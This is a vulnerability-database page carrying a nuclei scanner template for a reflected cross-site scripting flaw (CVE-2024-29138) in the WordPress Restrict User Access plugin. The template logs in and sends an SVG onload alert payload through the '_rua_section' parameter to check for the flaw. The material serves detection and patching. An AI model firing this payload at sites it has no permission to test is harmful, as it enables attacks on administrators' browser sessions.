Lucene search
K

WordPress Restrict User Access <= 2.5 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

WordPress Restrict User Access before 2.6 vulnerable to reflected cross site scripting.

Related
Refs
Code
id: CVE-2024-29138

info:
  name: WordPress Restrict User Access <= 2.5 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    WordPress Restrict User Access – Membership Plugin with Force versions before 2.6 is vulnerable to Reflected Cross-Site Scripting via the '_rua_section' parameter in the admin level edit page.
  impact: |
    Attackers can execute arbitrary scripts in authenticated admin browsers, potentially leading to session hijacking, privilege escalation, WordPress admin account takeover, malicious plugin installation, and website defacement.
  remediation: |
    Update Restrict User Access plugin to version 2.6 or later.
  reference:
    - https://patchstack.com/database/wordpress/plugin/restrict-user-access/vulnerability/wordpress-restrict-user-access-plugin-2-5-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2024-29138
    - https://wordpress.org/plugins/restrict-user-access/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-29138
    epss-score: 0.00622
    epss-percentile: 0.45452
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/plugins/restrict-user-access/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,xss,authenticated,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin.php?page=wprua-level&action=edit HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        level_id=1&_rua_section="><svg onload=alert(document.domain)>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "\"><svg onload=alert(document.domain)>","restrict-user-access")'
        condition: and
# digest: 4a0a0047304502204f9c92b0fa00a0611ccc0fdcaaa9eefbc753814cd958caf84102c0227bbbed03022100f887d4e50ddc977fae5f53bce429d2b2dbd5f0af7aa2d0fc09c08039f4e46f38:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.16.1 - 7.1
EPSS0.00622
SSVC
18